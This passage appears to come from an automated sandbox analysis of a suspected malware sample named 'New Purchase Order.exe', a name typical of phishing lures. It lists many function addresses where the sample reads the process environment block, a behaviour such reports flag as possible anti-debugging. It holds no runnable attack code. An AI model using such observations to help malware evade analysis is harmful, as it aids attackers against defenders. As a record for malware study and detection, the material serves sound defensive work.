            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E02E1 mov eax, dword ptr fs:[00000030h]9_2_017E02E1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E02E1 mov eax, dword ptr fs:[00000030h]9_2_017E02E1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E02E1 mov eax, dword ptr fs:[00000030h]9_2_017E02E1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA2C3 mov eax, dword ptr fs:[00000030h]9_2_017DA2C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA2C3 mov eax, dword ptr fs:[00000030h]9_2_017DA2C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA2C3 mov eax, dword ptr fs:[00000030h]9_2_017DA2C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA2C3 mov eax, dword ptr fs:[00000030h]9_2_017DA2C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA2C3 mov eax, dword ptr fs:[00000030h]9_2_017DA2C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01858243 mov eax, dword ptr fs:[00000030h]9_2_01858243
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01858243 mov ecx, dword ptr fs:[00000030h]9_2_01858243
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A625D mov eax, dword ptr fs:[00000030h]9_2_018A625D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0188A250 mov eax, dword ptr fs:[00000030h]9_2_0188A250
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0188A250 mov eax, dword ptr fs:[00000030h]9_2_0188A250
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]9_2_01880274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]9_2_01880274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]9_2_01880274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]9_2_01880274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]9_2_01880274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]9_2_01880274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]9_2_01880274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]9_2_01880274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]9_2_01880274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]9_2_01880274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]9_2_01880274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01880274 mov eax, dword ptr fs:[00000030h]9_2_01880274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01804588 mov eax, dword ptr fs:[00000030h]9_2_01804588
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E59C mov eax, dword ptr fs:[00000030h]9_2_0180E59C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018505A7 mov eax, dword ptr fs:[00000030h]9_2_018505A7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018505A7 mov eax, dword ptr fs:[00000030h]9_2_018505A7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018505A7 mov eax, dword ptr fs:[00000030h]9_2_018505A7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D8550 mov eax, dword ptr fs:[00000030h]9_2_017D8550
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D8550 mov eax, dword ptr fs:[00000030h]9_2_017D8550
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE53E mov eax, dword ptr fs:[00000030h]9_2_017FE53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE53E mov eax, dword ptr fs:[00000030h]9_2_017FE53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE53E mov eax, dword ptr fs:[00000030h]9_2_017FE53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE53E mov eax, dword ptr fs:[00000030h]9_2_017FE53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE53E mov eax, dword ptr fs:[00000030h]9_2_017FE53E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0535 mov eax, dword ptr fs:[00000030h]9_2_017E0535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0535 mov eax, dword ptr fs:[00000030h]9_2_017E0535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0535 mov eax, dword ptr fs:[00000030h]9_2_017E0535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0535 mov eax, dword ptr fs:[00000030h]9_2_017E0535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0535 mov eax, dword ptr fs:[00000030h]9_2_017E0535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0535 mov eax, dword ptr fs:[00000030h]9_2_017E0535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E5CF mov eax, dword ptr fs:[00000030h]9_2_0180E5CF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E5CF mov eax, dword ptr fs:[00000030h]9_2_0180E5CF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A5D0 mov eax, dword ptr fs:[00000030h]9_2_0180A5D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A5D0 mov eax, dword ptr fs:[00000030h]9_2_0180A5D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C5ED mov eax, dword ptr fs:[00000030h]9_2_0180C5ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C5ED mov eax, dword ptr fs:[00000030h]9_2_0180C5ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01866500 mov eax, dword ptr fs:[00000030h]9_2_01866500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4500 mov eax, dword ptr fs:[00000030h]9_2_018A4500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4500 mov eax, dword ptr fs:[00000030h]9_2_018A4500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4500 mov eax, dword ptr fs:[00000030h]9_2_018A4500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4500 mov eax, dword ptr fs:[00000030h]9_2_018A4500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4500 mov eax, dword ptr fs:[00000030h]9_2_018A4500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4500 mov eax, dword ptr fs:[00000030h]9_2_018A4500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4500 mov eax, dword ptr fs:[00000030h]9_2_018A4500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FE5E7 mov eax, dword ptr fs:[00000030h]9_2_017FE5E7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D25E0 mov eax, dword ptr fs:[00000030h]9_2_017D25E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D65D0 mov eax, dword ptr fs:[00000030h]9_2_017D65D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F45B1 mov eax, dword ptr fs:[00000030h]9_2_017F45B1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F45B1 mov eax, dword ptr fs:[00000030h]9_2_017F45B1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180656A mov eax, dword ptr fs:[00000030h]9_2_0180656A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180656A mov eax, dword ptr fs:[00000030h]9_2_0180656A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180656A mov eax, dword ptr fs:[00000030h]9_2_0180656A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D2582 mov eax, dword ptr fs:[00000030h]9_2_017D2582
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D2582 mov ecx, dword ptr fs:[00000030h]9_2_017D2582
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FA470 mov eax, dword ptr fs:[00000030h]9_2_017FA470
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FA470 mov eax, dword ptr fs:[00000030h]9_2_017FA470
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017FA470 mov eax, dword ptr fs:[00000030h]9_2_017FA470
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0188A49A mov eax, dword ptr fs:[00000030h]9_2_0188A49A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017C645D mov eax, dword ptr fs:[00000030h]9_2_017C645D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F245A mov eax, dword ptr fs:[00000030h]9_2_017F245A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018044B0 mov ecx, dword ptr fs:[00000030h]9_2_018044B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185A4B0 mov eax, dword ptr fs:[00000030h]9_2_0185A4B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CC427 mov eax, dword ptr fs:[00000030h]9_2_017CC427
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CE420 mov eax, dword ptr fs:[00000030h]9_2_017CE420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CE420 mov eax, dword ptr fs:[00000030h]9_2_017CE420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017CE420 mov eax, dword ptr fs:[00000030h]9_2_017CE420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01808402 mov eax, dword ptr fs:[00000030h]9_2_01808402
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01808402 mov eax, dword ptr fs:[00000030h]9_2_01808402
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01808402 mov eax, dword ptr fs:[00000030h]9_2_01808402
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D04E5 mov ecx, dword ptr fs:[00000030h]9_2_017D04E5
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856420 mov eax, dword ptr fs:[00000030h]9_2_01856420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856420 mov eax, dword ptr fs:[00000030h]9_2_01856420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856420 mov eax, dword ptr fs:[00000030h]9_2_01856420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856420 mov eax, dword ptr fs:[00000030h]9_2_01856420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856420 mov eax, dword ptr fs:[00000030h]9_2_01856420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856420 mov eax, dword ptr fs:[00000030h]9_2_01856420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01856420 mov eax, dword ptr fs:[00000030h]9_2_01856420
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A430 mov eax, dword ptr fs:[00000030h]9_2_0180A430
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180E443 mov eax, dword ptr fs:[00000030h]9_2_0180E443
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D64AB mov eax, dword ptr fs:[00000030h]9_2_017D64AB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0188A456 mov eax, dword ptr fs:[00000030h]9_2_0188A456
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185C460 mov ecx, dword ptr fs:[00000030h]9_2_0185C460
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0187678E mov eax, dword ptr fs:[00000030h]9_2_0187678E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D8770 mov eax, dword ptr fs:[00000030h]9_2_017D8770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E0770 mov eax, dword ptr fs:[00000030h]9_2_017E0770
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018847A0 mov eax, dword ptr fs:[00000030h]9_2_018847A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D0750 mov eax, dword ptr fs:[00000030h]9_2_017D0750
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018507C3 mov eax, dword ptr fs:[00000030h]9_2_018507C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185E7E1 mov eax, dword ptr fs:[00000030h]9_2_0185E7E1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D0710 mov eax, dword ptr fs:[00000030h]9_2_017D0710
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C700 mov eax, dword ptr fs:[00000030h]9_2_0180C700
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D47FB mov eax, dword ptr fs:[00000030h]9_2_017D47FB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D47FB mov eax, dword ptr fs:[00000030h]9_2_017D47FB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01800710 mov eax, dword ptr fs:[00000030h]9_2_01800710
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F27ED mov eax, dword ptr fs:[00000030h]9_2_017F27ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F27ED mov eax, dword ptr fs:[00000030h]9_2_017F27ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F27ED mov eax, dword ptr fs:[00000030h]9_2_017F27ED
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C720 mov eax, dword ptr fs:[00000030h]9_2_0180C720
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C720 mov eax, dword ptr fs:[00000030h]9_2_0180C720
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184C730 mov eax, dword ptr fs:[00000030h]9_2_0184C730
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180273C mov eax, dword ptr fs:[00000030h]9_2_0180273C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180273C mov ecx, dword ptr fs:[00000030h]9_2_0180273C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180273C mov eax, dword ptr fs:[00000030h]9_2_0180273C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DC7C0 mov eax, dword ptr fs:[00000030h]9_2_017DC7C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180674D mov esi, dword ptr fs:[00000030h]9_2_0180674D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180674D mov eax, dword ptr fs:[00000030h]9_2_0180674D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180674D mov eax, dword ptr fs:[00000030h]9_2_0180674D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01854755 mov eax, dword ptr fs:[00000030h]9_2_01854755
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812750 mov eax, dword ptr fs:[00000030h]9_2_01812750
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812750 mov eax, dword ptr fs:[00000030h]9_2_01812750
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D07AF mov eax, dword ptr fs:[00000030h]9_2_017D07AF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185E75D mov eax, dword ptr fs:[00000030h]9_2_0185E75D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180C6A6 mov eax, dword ptr fs:[00000030h]9_2_0180C6A6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018066B0 mov eax, dword ptr fs:[00000030h]9_2_018066B0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EC640 mov eax, dword ptr fs:[00000030h]9_2_017EC640
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A6C7 mov ebx, dword ptr fs:[00000030h]9_2_0180A6C7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A6C7 mov eax, dword ptr fs:[00000030h]9_2_0180A6C7
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D262C mov eax, dword ptr fs:[00000030h]9_2_017D262C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017EE627 mov eax, dword ptr fs:[00000030h]9_2_017EE627
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018506F1 mov eax, dword ptr fs:[00000030h]9_2_018506F1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018506F1 mov eax, dword ptr fs:[00000030h]9_2_018506F1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E260B mov eax, dword ptr fs:[00000030h]9_2_017E260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E260B mov eax, dword ptr fs:[00000030h]9_2_017E260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E260B mov eax, dword ptr fs:[00000030h]9_2_017E260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E260B mov eax, dword ptr fs:[00000030h]9_2_017E260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E260B mov eax, dword ptr fs:[00000030h]9_2_017E260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E260B mov eax, dword ptr fs:[00000030h]9_2_017E260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E260B mov eax, dword ptr fs:[00000030h]9_2_017E260B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E6F2 mov eax, dword ptr fs:[00000030h]9_2_0184E6F2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E6F2 mov eax, dword ptr fs:[00000030h]9_2_0184E6F2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E6F2 mov eax, dword ptr fs:[00000030h]9_2_0184E6F2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E6F2 mov eax, dword ptr fs:[00000030h]9_2_0184E6F2
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E609 mov eax, dword ptr fs:[00000030h]9_2_0184E609
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01812619 mov eax, dword ptr fs:[00000030h]9_2_01812619
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01806620 mov eax, dword ptr fs:[00000030h]9_2_01806620
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01808620 mov eax, dword ptr fs:[00000030h]9_2_01808620
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A660 mov eax, dword ptr fs:[00000030h]9_2_0180A660
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0180A660 mov eax, dword ptr fs:[00000030h]9_2_0180A660
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189866E mov eax, dword ptr fs:[00000030h]9_2_0189866E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189866E mov eax, dword ptr fs:[00000030h]9_2_0189866E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D4690 mov eax, dword ptr fs:[00000030h]9_2_017D4690
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D4690 mov eax, dword ptr fs:[00000030h]9_2_017D4690
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01802674 mov eax, dword ptr fs:[00000030h]9_2_01802674
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F6962 mov eax, dword ptr fs:[00000030h]9_2_017F6962
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F6962 mov eax, dword ptr fs:[00000030h]9_2_017F6962
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017F6962 mov eax, dword ptr fs:[00000030h]9_2_017F6962
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018589B3 mov esi, dword ptr fs:[00000030h]9_2_018589B3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018589B3 mov eax, dword ptr fs:[00000030h]9_2_018589B3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018589B3 mov eax, dword ptr fs:[00000030h]9_2_018589B3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018669C0 mov eax, dword ptr fs:[00000030h]9_2_018669C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018049D0 mov eax, dword ptr fs:[00000030h]9_2_018049D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0189A9D3 mov eax, dword ptr fs:[00000030h]9_2_0189A9D3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017C8918 mov eax, dword ptr fs:[00000030h]9_2_017C8918
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017C8918 mov eax, dword ptr fs:[00000030h]9_2_017C8918
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185E9E0 mov eax, dword ptr fs:[00000030h]9_2_0185E9E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018029F9 mov eax, dword ptr fs:[00000030h]9_2_018029F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018029F9 mov eax, dword ptr fs:[00000030h]9_2_018029F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E908 mov eax, dword ptr fs:[00000030h]9_2_0184E908
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0184E908 mov eax, dword ptr fs:[00000030h]9_2_0184E908
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185C912 mov eax, dword ptr fs:[00000030h]9_2_0185C912
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA9D0 mov eax, dword ptr fs:[00000030h]9_2_017DA9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA9D0 mov eax, dword ptr fs:[00000030h]9_2_017DA9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA9D0 mov eax, dword ptr fs:[00000030h]9_2_017DA9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA9D0 mov eax, dword ptr fs:[00000030h]9_2_017DA9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA9D0 mov eax, dword ptr fs:[00000030h]9_2_017DA9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017DA9D0 mov eax, dword ptr fs:[00000030h]9_2_017DA9D0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0186892B mov eax, dword ptr fs:[00000030h]9_2_0186892B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_0185892A mov eax, dword ptr fs:[00000030h]9_2_0185892A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_01850946 mov eax, dword ptr fs:[00000030h]9_2_01850946
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_018A4940 mov eax, dword ptr fs:[00000030h]9_2_018A4940
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D09AD mov eax, dword ptr fs:[00000030h]9_2_017D09AD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017D09AD mov eax, dword ptr fs:[00000030h]9_2_017D09AD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 9_2_017E29A0 mov eax, dword ptr fs:[00000030h]9_2_017E29A0
